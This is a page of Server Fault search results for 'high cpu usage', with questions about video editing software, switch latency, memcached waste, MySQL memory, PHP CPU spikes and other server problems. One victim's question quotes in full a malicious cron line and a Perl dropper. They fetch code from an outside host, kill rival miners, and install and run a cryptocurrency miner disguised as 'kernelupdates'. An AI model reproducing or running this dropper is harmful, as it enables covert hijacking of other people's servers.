Search Results

Search found 17045 results on 682 pages for 'high cpu usage'.

  • Proper High-End Video Editing Software for Windows?

    - by Michael Stum
    I'm wondering if anyone here has experience with prosumer/high-end video editing? So far I use Adobe Premiere CS4, but sadly it is an unstable and buggy mess. This could be partially caused by the fact that my input material isn't always pure HDV/AVCHD; sometimes it is DivX or already pre-processed video. One thing I did like about Adobe, though, is that with After Effects and Encore they offer a good overall toolset, but if it's sub-par then it's no good. Luckily it is already paid for and was worth its money overall, so it's not a complete waste of money. But are there alternatives? After Effects especially is quite unique, and the closest thing I found is Apple's Final Cut Studio, which includes Motion and DVD Studio. The two downsides are that it requires a Mac and that it doesn't support Blu-ray. Any hints for Windows? Sony Vegas might be something I'll look at, but I'm guessing I'd have to keep using After Effects for any serious compositing/VFX?

  • Pinging switch results in alternating high/low response times

    - by Paul Pringle
    We have two switches that are behaving strangely. When I ping them, the responses alternate between high and low times:

        C:\Users\paul>ping sw-linksys1 -t

        Pinging sw-linksys1.sep.com [172.16.254.235] with 32 bytes of data:
        Reply from 172.16.254.235: bytes=32 time=39ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=154ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=142ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=143ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=146ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=152ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=153ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=153ms TTL=64
        Reply from 172.16.254.235: bytes=32 time=2ms TTL=64

    Other switches in the network behave normally. I've rebooted the switches, but the ping behaviour is still there. Any ideas on how to troubleshoot this? Thanks!

  • Network access lags for Win7 when server network utilization is high

    - by Jeff Miles
    We have a Dell PE2950 file server running Windows 2008, hosting a DFS namespace of ~1.2 TB. This server has two Broadcom 1Gbps NICs teamed together. When there is high traffic going to the server across the network (greater than 200 Mbps), any Windows 7 client accessing a DFS share at the time experiences severe performance problems. For example:

    Computer A has an AutoCAD drawing opened directly from the DFS share. Performance is normal, not causing any issues.
    Computer B begins a file transfer, putting an 11GB file onto a different DFS namespace on the same server.
    Computer A immediately notices lag while using AutoCAD. The cursor momentarily freezes within AutoCAD every 10 seconds or so, and any browsing of the DFS share is extremely slow.
    Computer B completes the file transfer, and performance returns to normal for Computer A.

    This only affects Windows 7 clients, on a variety of hardware (desktop + laptop). All of our Windows XP clients see no performance impact during the file transfer. Things I have tried, with no change:

    Had Computer A work from an entirely different RAID array from the file transfer destination
    Updated NIC drivers on clients and server
    Enabled TCP offload and receive side scaling on the server NIC (previously disabled when the issue began)
    Disabled antivirus during the file transfer

    I am currently having a user test applications other than AutoCAD while the file transfer occurs, and will update the question with that result. Does anyone have any recommendations for resolution or additional troubleshooting steps?
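
    A crude way to quantify the lag Computer A sees, rather than judging by the AutoCAD cursor, is to sample read latency on the share once a second while Computer B's transfer runs. A minimal Python sketch; the UNC path and probe file are assumptions, not paths from this setup:

        import time

        PATH = r"\\server\dfs\namespace\probe.dat"  # hypothetical small file on the share

        while True:
            start = time.perf_counter()
            with open(PATH, "rb") as f:
                f.read(4096)                        # one small read per sample
            elapsed_ms = (time.perf_counter() - start) * 1000
            print(time.strftime("%H:%M:%S"), f"{elapsed_ms:.1f} ms")
            time.sleep(1)

    Running this side by side on a Windows 7 client and an XP client would show the difference directly in numbers.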

  • Best usage for a laptop being used as a desktop without removable batteries

    - by Senseful
    After reading the information on http://batteryuniversity.com, I realize that one of the best ways to permanently damage a lithium-ion battery is to use the battery at a high temperature while it's fully charged. This is exactly what happens when you use the computer as if it were a desktop computer, since leaving it plugged in will keep the battery at 100% and using the computer will heat up the battery. This is why it's recommended to remove the battery from your laptop if you are using it in this scenario. My question is: what would you do if the laptop doesn't have removable batteries (e.g. a MacBook Pro)? Should I use some kind of charge cycle, such as: charge to 80%, unplug the power cord, use the laptop until it reaches 20%, then repeat the cycle by charging to 80% again? If so, which values should I use instead of 80% and 20%? (I think charging to 80% is better than 100% because of the damage that a hot battery at 100% can do, but I just made the figure 80% up, and I'm sure there's a better number to strive for which is backed by science.) I've read many of the articles on batteryuniversity.com, but couldn't find anything pertaining to this.

    Update: What about doing something like charging (or discharging) it to 50%, then plugging it in and turning on settings which use the battery as much as possible (e.g. brightness all the way up, wi-fi on, etc.), in order to try to maintain the battery at 50% (i.e. it charges at the same rate as it discharges)? This will probably heat up the battery, but it would mean you don't need to constantly plug and unplug the laptop. The one bad thing is that you are using up more charge cycles, which would decrease the battery life, so I'm not sure this is a good idea.

  • Unexpected(?) high 'wasted' memory in memcached

    - by Nanne
    Looking at our memcached stats, I think I have found an issue I was not aware of before. It seems that we have a strangely high amount of wasted space. I checked with phpmemcacheadmin for a change, and found this image staring at me. Now, I was under the impression that the worst-case scenario would be 50% waste, although I am the first to admit not knowing all the details. I have read, amongst others, this page, which is indeed somewhat old, but so is our version of memcached. I believe I do understand how the system works, but I have a hard time understanding how we could get to 76% wasted space. The eviction rate that phpmemcacheadmin shows is 2 ev/s, so there is some problem here. The primary question is: what can I do to fix this? I could throw more memory at it (there is some extra available, I think); maybe I should fiddle with the slab config (is that even possible with this version?); maybe there are other options? Upgrading the memcached version is not a quickly available option. The secondary question, out of curiosity, is of course whether a rate of 75% (and rising) wasted space is expected, and if so, why.

    System: this is currently not something I can do anything about. I know the memcached version isn't the newest, but these are the cards I've been dealt.

    Memcached 1.4.5
    Apache 2.2.17
    PHP 5.3.5
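
    For context on how much waste slab rounding alone can explain: memcached stores each item in the smallest chunk that fits it, with chunk sizes growing by a fixed factor (1.25 by default). A minimal Python sketch of that arithmetic; the growth factor and minimum chunk size are assumed defaults, not values read from this installation:

        def slab_chunk_sizes(factor=1.25, min_chunk=96, max_chunk=1024 * 1024):
            # Build the ladder of chunk sizes, one per slab class.
            sizes, size = [], min_chunk
            while size <= max_chunk:
                sizes.append(size)
                size = max(size + 1, int(size * factor))
            return sizes

        def wasted_fraction(item_size, sizes):
            # The item occupies one chunk; the unused remainder is waste.
            chunk = next(s for s in sizes if s >= item_size)
            return (chunk - item_size) / chunk

        sizes = slab_chunk_sizes()
        for item in (100, 1000, 10000, 100000):
            print(f"{item:>6} B item -> {wasted_fraction(item, sizes):.0%} wasted in its chunk")

    Rounding like this tops out at roughly 20% per chunk, so a 76% figure suggests a different mechanism, for example whole slabs still assigned to size classes that current traffic no longer uses; old versions such as 1.4.5 cannot reassign those pages.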

  • Wireless router - configuring for a low-latency, high-traffic environment

    - by Mark C
    Hey all, I have a few questions about configuring a router to achieve low-latency, high-speed throughput on a local area network that is not connected to the internet. I've read up on some stuff, but thought I would solicit some opinions here on what I've found and what I want to know:

    Turn off SSID broadcast - it produces extraneous packets that all clients receive and reply (?) to. Not a huge deal, but it may help a bit.
    Mixed-mode off - I should attempt to have all devices using the same standard (e.g. 802.11n) and turn mixed mode off.

    Any thoughts on security? Does having WEP or any of the WPA variants actually increase latency? Nothing super secure is going over this LAN, so if turning security off made things better, that'd be cool. Any other thoughts or things to focus on to create the low-latency environment I'm trying to go for would be great. Links to webpages and papers are also cool; I'm open to going through a bunch of stuff. Thanks in advance!

  • Netgear CG3000D new Modem/Router - Random High Ping

    - by justin.chmura
    Cox recently came out and looked at my internet connection and decided that the modem I had was causing high latency. The speed was fine, but the ping would spike to 100 and over when gaming or putting any load beyond browsing on the line. After they replaced it, it seems like I get better latency overall, but when it spikes I get upwards of 300 ping with around 500 jitter. I figured I would hit the Server Fault universe before sending another email to Cox. I opted not to do the Cox setup, as it was an extra $20 which I thought would have just set up the wireless (which I can handle). Is there a setting or something that I missed that needs to be set up? The firmware for the CG3000D is awful and not fun to use. I did change some hidden settings on the RgServices.asp page (I'll attach a screenshot). I've also heard that router/modem combos are awful and that I should go back and just ask for a stand-alone modem. Any input is helpful. All screenshots: http://imgur.com/a/JX6qu#0

  • High data on recv-q buffer and thread lock on java.io.BufferedInputStream in linux

    - by Sagar Patel
    We have a Java application running on Linux (Ubuntu server). We have been facing a high recv-q problem for quite some time. Every few hours the application hangs and stops reading data from the socket. In a thread dump, we found the stack trace below:

        "Receiver-146" daemon prio=10 tid=0x00007fb3fc010000 nid=0x7642 runnable [0x00007fb5906c5000]
           java.lang.Thread.State: RUNNABLE
                at java.net.SocketInputStream.socketRead0(Native Method)
                at java.net.SocketInputStream.read(SocketInputStream.java:150)
                at java.net.SocketInputStream.read(SocketInputStream.java:121)
                at java.io.BufferedInputStream.fill(BufferedInputStream.java:235)
                at java.io.BufferedInputStream.read1(BufferedInputStream.java:275)
                at java.io.BufferedInputStream.read(BufferedInputStream.java:334)
                - locked <0x00000007688f1ff0> (a java.io.BufferedInputStream)
                at org.smpp.TCPIPConnection.receive(TCPIPConnection.java:413)
                at org.smpp.ReceiverBase.receivePDUFromConnection(ReceiverBase.java:197)
                at org.smpp.Receiver.receiveAsync(Receiver.java:351)
                at org.smpp.ReceiverBase.process(ReceiverBase.java:96)
                at org.smpp.util.ProcessingThread.run(ProcessingThread.java:199)
                at java.lang.Thread.run(Thread.java:722)

    We are not able to trace the exact reason behind this; kindly help. We are using a 16-core machine, and the load on the system is around 30-40 at the time of the issue. We use the command ss dst <ip> to find the recv-q. Recently we have been facing issues where the recv-q gets stuck: the receive buffer fills at some point, the recv-q size does not decrease, and as a result we are losing a lot of hits from the other side, because our application is not accepting any data.
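
    Since ss already exposes the number, one low-effort way to catch the moment the reader stops draining the socket is to poll ss and log the summed Recv-Q for the peer. A hedged Python sketch; the peer address is a placeholder, and the column positions assume plain ss -tn output:

        import subprocess
        import time

        PEER = "10.0.0.5"  # hypothetical peer address; substitute the real one

        def total_recv_q(peer):
            out = subprocess.run(["ss", "-tn", "dst", peer],
                                 capture_output=True, text=True).stdout
            total = 0
            for line in out.splitlines()[1:]:          # skip the header line
                cols = line.split()
                if len(cols) >= 2 and cols[1].isdigit():
                    total += int(cols[1])              # Recv-Q column
            return total

        while True:
            print(time.strftime("%H:%M:%S"), total_recv_q(PEER))
            time.sleep(60)

    Correlating that log with a periodic jstack of the receiver thread should show whether Recv-Q starts growing while the thread still claims to be RUNNABLE in socketRead0.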

  • MySQL Memory Limit Windows Server 2003

    - by Matt
    I am running MySQL 5.0.51a on Windows Server 2003 Standard Edition on an HP DL580 G4 with 3GB installed. One of my database tables has grown to 5.3 GB, with an index file of 2.5 GB, which I believe is causing MySQL to be slow due to having to constantly load and unload the index file when updates are made to the table. The server itself seems to be performing OK, because MySQL is only using about 500MB of memory (there are other apps running on the system, but MySQL uses the most memory). The table is fairly active, with new records being added all through the day, but no deletes, ever. The MySQL server allows up to 600 connections, but only a small number (10 or 20) would actually be writing to this table. I increased the memory limits in MySQL, but since the max connections is so high I don't think I can give each connection 1GB without risking a problem. Is there some tuning that would let just certain connections get a lot of memory? So I have started to look for alternatives to avert the crisis I know is coming soon. Some of the options I have:

    Upgrade to Server 2003 Enterprise to install 64GB of memory. Question: would 32-bit MySQL be able to access more than 2GB? Would that be 2GB per thread? That would still be smaller than the index file, so it might not solve the problem completely, but it would be better than now.
    Upgrade to Server 200x 64-bit and MySQL 64-bit.
    Switch to a *nix 64-bit server.

    If anybody has suggestions for things to do in the meantime, opinions on which way to go, or other things that I have overlooked, I would appreciate the help. Thanks
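
    One way to check whether the index file is really being thrashed, rather than inferring it from the 500MB figure, is the MyISAM key cache miss rate, computed from two SHOW GLOBAL STATUS counters. A sketch of the arithmetic in Python with made-up counter values; substitute the real numbers from the server:

        # Hypothetical values of the Key_read_requests / Key_reads status counters.
        key_read_requests = 48_212_330   # index block lookups served
        key_reads = 3_904_118            # lookups that had to read the .MYI file from disk

        miss_rate = key_reads / key_read_requests
        print(f"key cache miss rate: {miss_rate:.1%}")
        # A common rule of thumb: a miss rate much above 1% suggests
        # key_buffer_size is too small for the working set.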

  • Developing a high-performance and scalable Zend Framework website

    - by Daniel
    We are going to develop an ads website like http://www.gumtree.com/ (it will not be exactly like it, just to give you an idea) and we are having some issues regarding performance and scalability. We are planning on using Zend Framework for this project, but that is all I'm sure of at this point. I don't think a classic approach like Zend Framework (PHP) + MySQL + Memcache + jQuery (and I would throw Doctrine 2 in there too) will result in a high-performance application. I was thinking of making this a RESTful application (with Zend Framework) + NGINX (or maybe MongoDB) + Memcache (or eAccelerator, though I understand this will create problems with scalability on multiple servers) + jQuery, with a CDN for static content, a server for images, and a scalable server for the requests and the rest. My questions are: What do you think about my approach? What solutions would you recommend in terms of the server approach (MySQL, NGINX, MongoDB or pgsql) for a scalable application expected to have a lot of traffic using PHP? I would be interested in your approach. Note: I'm a Zend Framework developer and don't have too much experience with the servers part (to determine what would be the best solution for my scalable application).

  • PHP hits 100% CPU and eats RAM at the same time Monday to Friday

    - by Daniel Samuels
    We run a learning platform for primary schools here in the UK, and it's all been running extremely well. However, at around 4PM Monday to Friday we see the same issue arise: 1-2 PHP threads will spike to 100% CPU and gradually start eating up RAM until the server(s) fall over. 98%+ of our requests are HTTPS; these come into our Layer 7 load balancer, which decrypts the SSL data, adds the X-HTTP-Forwarded-For header and forwards the data on to an application server (we have 2 of those at the moment) on port 80. Our application servers have Varnish on port 80, which takes in the request from the load balancer and passes it through to Nginx on port 81. Nginx then works out which 'vhost' it needs to use and passes any PHP processing through to PHP-CGI, which is listening on a socket (managed through spawn-fcgi). There's an instance of Memcached running too; MySQL runs on a separate server / slave setup. Throughout the day the load will typically go no higher than 0.8 on either of the application servers; however, at around 4PM our problem arises. I've managed to run strace on a few of the actual threads when they cause the problem, and I always see the same thing:

        stat("/usr/share/zoneinfo/Europe/London", {st_mode=S_IFREG|0644, st_size=3661, ...}) = 0
        stat("/usr/share/zoneinfo/Europe/London", {st_mode=S_IFREG|0644, st_size=3661, ...}) = 0

    This is repeated infinitely and never stops until you SIGKILL the process or the OOM killer kills it. There are no cron jobs scheduled to run at that time, and I don't have any way of seeing exactly which Nginx request is associated with the PHP process that is running. We are running PHP 5.3.14, which we upgraded to from 5.3.8 last week to rule out the older version being the problem. This issue has been going on for a few months now, and we have no idea what is causing it. We deploy our software very frequently, so it's difficult to track down a specific release which may have started the problem, especially as we do not know the date of the first occurrence of this issue. Varnish is version 3.0.1, Nginx is 1.0.6 (which I understand is about a year old now), our servers are running CentOS release 5.7 (Final), and they have Intel i3 540s at 3.07GHz and 8GB of RAM. There's a discussion on the Debian mailing list about something very similar; you can find that here. Has anyone seen anything like this in the past? Does anyone have any ideas or suggestions? Is there a way of linking an Nginx request directly to a PHP thread? Is there a better way of seeing what the PHP process is doing? (I've seen GDB mentioned, though I'll have to recompile PHP.) Thanks!
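
    One way to firm up the strace evidence is to trace a spinning process for a few seconds and tally which syscall/path pairs dominate. A small Python sketch for summarising the log; the regex only handles the common case where the first argument is a quoted path:

        import re
        import sys
        from collections import Counter

        # Usage: strace -p <pid> -o trace.log  (let it run for a few seconds),
        # then:  python tally.py trace.log
        counts = Counter()
        pattern = re.compile(r'^(\w+)\("([^"]*)"')

        with open(sys.argv[1]) as log:
            for line in log:
                match = pattern.match(line)
                if match:
                    counts[match.group(1), match.group(2)] += 1

        for (syscall, path), n in counts.most_common(10):
            print(f"{n:8d}  {syscall}({path})")

    If stat() of /usr/share/zoneinfo dwarfs everything else, it is worth checking whether date.timezone is set in php.ini; an unset timezone is a common, though by no means certain, cause of repeated zoneinfo lookups in PHP 5.3.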

  • Server to server replication, high CPU and 32K/corrupt docs

    - by nick wall
    Summary: if a database contains a doc with the 32K issue, or a corrupt doc, server-to-server replication causes a marked increase in CPU in the nserver.exe task, which effectively causes our server(s) to slow right down. We have a 5-server cluster (1 "hub" and 4 HTTP servers accessed via reverse proxy and SSO for load balancing and redundancy). All are physically located next to each other on the network; they don't have dedicated network ports for cluster or replication traffic. I realise the IBM recommendation is a dedicated port for the cluster. Cluster queues are in tolerance, and under heavy application user load, i.e. when the maximum number of documents are being created, edited and deleted, the replication times between servers are negligible. Normally, all is well. Of the servers in the cluster, 1 is considered the "hub", and it initiates a PUSH-PULL replication with its cluster mates every 60 mins, so that the replication load is taken by the hub and not the cluster mates.

    The problem we have: every now and then we get a slow replication time from the hub to a cluster mate, sometimes up to 30 mins. This maxes out the nserver.exe task on the cluster mate, which causes it to respond to HTTP requests very slowly. In the past, we have found that a corrupt document in the DB can have this effect, but on those occasions the server log will show the corrupt doc noteId; we run fixup, and all is well. But we are not now seeing any record of corrupt docs. What we have noticed is that if a doc with the 32K issue is present, the same thing can happen. Our only solution in that case is to run: fixup mydb.nsf -V, which shows it is purging a 32K doc. Luckily we run a reverse proxy, so we can shut HTTP servers down without users noticing, but users do notice when a server has the problem!

    Has anyone else seen this occur? I have set up DDM event handlers for many of the replication events. I have set the replication timeout limit to 5 mins (the max we usually see under full user load is 0.1 min) to prevent it replicating for 30 mins as before; this is a temporary workaround. Does anyone know of a DDM event to trap the 32K issue? We could at least then send an alert.

    Regarding the 32K issue: this probably needs another thread, but we are finding it relatively hard to locate the source of the issue, as the 32K event is fairly rare. Our app is fairly complex, interacting with various other external web services, with 2-way data transfer. But if we do encounter a 32K doc, we can't look at the field properties, so we can't work out which field has the issue, which would give us a clue as to which process is the culprit. As above, we run a fixup -V. Any help/comments on this would be gratefully received.

  • Large Scale VHDL modularization techniques

    - by oxinabox.ucc.asn.au
    I'm thinking about implementing a 16-bit CPU in VHDL. A simplish CPU: ADD, MULS, NEG, bit shift, JUMP, relative jump, BREQ, relative BREQ... I don't know, something along these lines. Probably all working only with 16-bit operands. I might even cut it down and use only a single operand and an accumulator. With some status registers: Carry, Zero, Neg (unless I use an accumulator). I know how to design all the parts from logic gates, and plan to build them up from first principles. So for my ALU I'll need to 'build' an adder, probably a carry look-ahead group adder; this adder is itself made up of a couple of parts, which are themselves made up of a couple of parts. Anyway, my problem is not the CPU design, or the VHDL (I know the language, more or less). It's how I should keep things organised. How should I use packages? How should I name my processes and port maps? (I've never seen the benefit of naming the port maps, or processes.)

  • Understanding top output in Linux

    - by Rayne
    Hi, I'm trying to determine the CPU usage of a program by looking at the output from top in Linux. I understand that %us means userspace and %sy means system/kernel, etc. But say I see 100% us. Does this mean that the CPU is really doing only useful work? What if the CPU is tied up waiting for resources that are not available, or on cache misses? Would that also show up in the %us column, or in any other column? Thank you.
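
    On the core question: %us counts time the CPU spends executing user code, and a core stalled on cache misses still counts as busy, so 100% us does not necessarily mean useful work is being done; only blocking (on I/O, for example) moves time into %wa or %id. A rough illustrative Python sketch, with sizes picked arbitrarily; both loops should sit at ~100% us in top even though the second wastes many cycles waiting on memory:

        import random
        import time

        N = 1 << 22
        data = list(range(N))
        random.shuffle(data)

        def sequential_sum():
            total = 0
            for i in range(N):          # predictable, cache-friendly access
                total += i
            return total

        def pointer_chase():
            total, i = 0, 0
            for _ in range(N):          # unpredictable, cache-hostile access
                i = data[i]
                total += i
            return total

        for fn in (sequential_sum, pointer_chase):
            start = time.perf_counter()
            fn()
            print(fn.__name__, f"{time.perf_counter() - start:.2f} s")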

  • High apache load but little traffic logged

    - by nrambeck
    I recently installed Varnish to sit in front of Apache on a dedicated server running a single site. It appears to be working well, but the load on Apache is still very high. What doesn't make sense is that the Apache access log shows almost no traffic getting past Varnish. When I tail the Apache log I see about 1-3 hits per second come through. Here is what the load on Apache looks like:

        USER    PID   %CPU %MEM    VSZ    RSS TTY STAT START TIME   COMMAND
        apache  13834  8.1  1.0 107716  34164 ?   S    08:24 0:02   /usr/sbin/httpd
        apache  13835  8.1  1.0 107716  33856 ?   S    08:24 0:02   /usr/sbin/httpd
        apache  11483  7.9  0.9 105916  30788 ?   S    08:23 0:06   /usr/sbin/httpd
        apache  12255  7.5  1.0 107476  33312 ?   S    08:24 0:04   /usr/sbin/httpd
        apache   9340  7.2  1.1 107732  34916 ?   R    08:23 0:09   /usr/sbin/httpd
        apache  12029  6.8  0.9 106908  30416 ?   S    08:24 0:04   /usr/sbin/httpd
        apache  11577  6.7  1.0 107192  34180 ?   S    08:24 0:05   /usr/sbin/httpd
        apache  11486  6.6  1.0 106176  33112 ?   S    08:23 0:05   /usr/sbin/httpd
        apache  11796  6.4  1.0 106936  31916 ?   S    08:24 0:04   /usr/sbin/httpd
        apache  13815  6.3  1.0 107988  34464 ?   S    08:24 0:02   /usr/sbin/httpd
        apache  18089  6.3  1.3 107444  43212 ?   S    08:11 0:52   /usr/sbin/httpd
        apache  11797  5.9  1.0 107716  34580 ?   S    08:24 0:04   /usr/sbin/httpd
        apache   7655  5.9  0.0      0      0 ?   Z    08:22 0:09   [httpd] <defunct>
        mysql    8033  5.9  6.2 318240 199512 ?   Sl   May14 352:34 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/va
        apache  11488  5.8  0.9 106924  31632 ?   S    08:23 0:04   /usr/sbin/httpd
        apache   9375  5.7  1.1 106956  35552 ?   S    08:23 0:07   /usr/sbin/httpd
        apache   3551  5.6  1.1 106956  36140 ?   S    08:20 0:14   /usr/sbin/httpd
        apache   7657  5.6  1.0 106968  32472 ?   S    08:22 0:09   /usr/sbin/httpd
        apache  11433  5.6  1.0 107716  34396 ?   S    08:23 0:04   /usr/sbin/httpd
        apache   5505  5.5  1.1 106944  34924 ?   S    08:21 0:12   /usr/sbin/httpd
        apache   7172  5.3  1.1 106972  35368 ?   S    08:22 0:09   /usr/sbin/httpd
        apache  10088  5.2  0.9 106160  31240 ?   S    08:23 0:04   /usr/sbin/httpd
        apache   7656  5.1  1.0 106436  34388 ?   S    08:22 0:08   /usr/sbin/httpd
        apache   3468  5.0  1.1 107716  35968 ?   S    08:20 0:13   /usr/sbin/httpd
        apache  14242  4.8  1.0 107728  33032 ?   S    08:25 0:00   /usr/sbin/httpd
        apache   3578  4.8  1.1 107988  35964 ?   S    08:20 0:12   /usr/sbin/httpd
        apache  28192  4.8  1.2 106944  38060 ?   S    08:17 0:23   /usr/sbin/httpd
        apache   3277  4.6  1.1 106956  35688 ?   S    08:20 0:13   /usr/sbin/httpd
        apache  15434  3.7  0.7 106908  24684 ?   S    08:25 0:00   /usr/sbin/httpd

    There is a default Apache log and one other VirtualHost log set up. I'm concerned that Apache is handling some kind of traffic that is not being logged. Is that possible? And is there anything I can do to capture that traffic?
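
    To test whether Apache is serving requests that never reach the access log, it helps to compare the log's growth rate with how busy Apache actually is. A crude Python sketch that samples both; the log path is an assumption, and counting httpd processes is only a rough proxy for load:

        import subprocess
        import time

        ACCESS_LOG = "/var/log/httpd/access_log"   # hypothetical path; check the vhost log too

        def line_count(path):
            with open(path, "rb") as f:
                return sum(1 for _ in f)

        def httpd_count():
            out = subprocess.run(["pgrep", "-c", "httpd"],
                                 capture_output=True, text=True).stdout
            return int(out.strip() or 0)

        previous = line_count(ACCESS_LOG)
        while True:
            time.sleep(10)
            current = line_count(ACCESS_LOG)
            print(f"{(current - previous) / 10:.1f} req/s logged, "
                  f"{httpd_count()} httpd processes")
            previous = current

    If the process count stays high while the logged rate stays at 1-3 req/s, enabling mod_status (server-status with ExtendedStatus On) would show what those workers are actually doing.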

  • MS Security Essentials efficiency/usage, suspicious processes

    - by biggvsdiccvs
    I recently noticed that my (originally pretty fast) Windows 7 Pro laptop started getting slow and using a lot of CPU power for no apparent reason. A full scan by Microsoft Security Essentials revealed nothing. After some investigation, I found multiple instances of a strange process called urpev.exe and a couple of similar exe files sitting in subdirectories of Users//AppData/Roaming (this particular one was in a folder called Xyceowme). Description: "Mescrosift Visaal Studie 2010". Company name: "Mesrosift Corporatien". Is it a virus or something? :)

    Now, all of these exe files were scheduled to be started from the Task Scheduler by tasks with names like "Security Center Update - 1291373911" and similar. My user name was listed as the author of the tasks. I disabled the tasks, restarted the computer in safe mode and moved all of the exe files to quarantine for further investigation. All of this was done last night. I just scanned the files with Security Essentials again (not updated since yesterday) in the quarantine location, and this time it found PWS:Win32/Zbot.gen!plock in urpev.exe (but not in the other exe files, which are most likely viruses too). Category: Password Stealer. Description: This program is dangerous and captures user passwords.

    Another strange process is browser.exe (not chrome.exe) by Google Inc., described as Google Chrome. I uninstalled Chrome, but it's still there. It runs out of Users\\AppData\LocalLow\UIVoice\ToolMedium\browser.exe, and if I move it in safe mode, it just reappears there, and multiple instances run. Needless to say, if I kill it, it just runs again. I couldn't see anything in Task Scheduler, but found a couple of references to it in the Registry Editor: HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/LowRegistry/Audio/PolicyConfig/PropertyStore/ and HKEY_USERS/S-1-5-21-1685709306-872053864-2599010960-1002/Software/Microsoft/Internet Explorer/LowRegistry/Audio/PolicyConfig/PropertyStore/. Maybe it's a legit process, but it seems kind of strange. For the time being, I suspended the process and killed all of its child processes when I booted up the laptop.

    I used Security Essentials to scan the system periodically, but obviously it's not effective against at least one virus. I had the "real-time protection" turned off. Would it help if it were turned on, and how much of a nuisance would it be? I wonder if there is a better alternative to Security Essentials. Over the years I've used multiple antivirus products, at home and especially at work, and was not very happy with any of them. Apparently asking for software recommendations or comparisons is taboo here, but I will mention that I installed Malwarebytes, and it was able to find and quarantine a bunch of suspicious files, at least some of which were truly infected; but when it scans the bogus security center update executables from Mesrosift Corporatien, it finds nothing wrong.

    Also, any thoughts on the browser.exe mystery? Neither MS Security Essentials nor Malwarebytes found anything wrong with that file. However, after I ran a Malwarebytes scan, quarantined everything it found suspicious and rebooted the laptop, the process did not run.

  • ./kernelupdates 100% CPU usage

    - by Vaibhav Panmand
    I have a CentOS 6 server running some WordPress and Tomcat websites. In the last two days it has been crashing continuously. After investigation we found a kernelupdates binary consuming 100% CPU on the server. The process is shown below:

        ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

    This does not look like a valid kernel update. The server might be compromised and the process installed by a hacker, so I killed the process and removed the apache user's cron entries. But somehow the process started again after a couple of hours, and the cron entries were restored as well; I am searching for whatever is modifying the cron jobs. Does this process belong to a miner? How can we stop the cron job modification and clean out the source of this process?

    Cron entry (apache user):

        */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt

    The downloaded abc.txt:

        #!/usr/bin/perl
        system("killall -9 minerd");
        system("killall -9 PWNEDa");
        system("killall -9 PWNEDb");
        system("killall -9 PWNEDc");
        system("killall -9 PWNEDd");
        system("killall -9 PWNEDe");
        system("killall -9 PWNEDg");
        system("killall -9 PWNEDm");
        system("killall -9 minerd64");
        system("killall -9 minerd32");
        system("killall -9 named");
        $rn=1;
        $ar=`uname -m`;
        while($rn==1 || $rn==0) { $rn=int(rand(11)); }
        $exists=`ls /tmp/.ice-unix`;
        $cratch=`ps aux | grep -v grep | grep kernelupdates`;
        if($cratch=~/kernelupdates/gi) { die; }
        if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
            $wig=`wget --version | grep GNU`;
            if(length($wig>6)) {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            } else {
                if($ar=~/64/g) {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                } else {
                    system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
                }
            }
        }
        @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
        $prt=0;
        while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
        print "setup for $rn:$prt done :-)\n";
        system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
        print "done!\n";

    Thanks in advance!
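
    Until the persistence mechanism is found, one stopgap is to watch the apache crontab for modification and capture the process table at that instant, to narrow down what is rewriting it. A rough Python sketch, assuming stock crontab/ps behaviour and that it runs as root; nothing in it is specific to this infection:

        import hashlib
        import subprocess
        import time

        def crontab_hash(user="apache"):
            # `crontab -l -u` needs root; stdout is "" if the user has no crontab
            out = subprocess.run(["crontab", "-l", "-u", user],
                                 capture_output=True, text=True).stdout
            return hashlib.sha256(out.encode()).hexdigest()

        baseline = crontab_hash()
        while True:
            time.sleep(5)
            current = crontab_hash()
            if current != baseline:
                stamp = time.strftime("%Y%m%d-%H%M%S")
                snapshot = subprocess.run(["ps", "auxf"],
                                          capture_output=True, text=True).stdout
                with open(f"/root/cron-change-{stamp}.log", "w") as f:
                    f.write(snapshot)  # inspect later for the process that wrote it
                print(stamp, "apache crontab changed; process snapshot saved")
                baseline = current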

  • Getting started with webserver clustering.

    - by Ernie
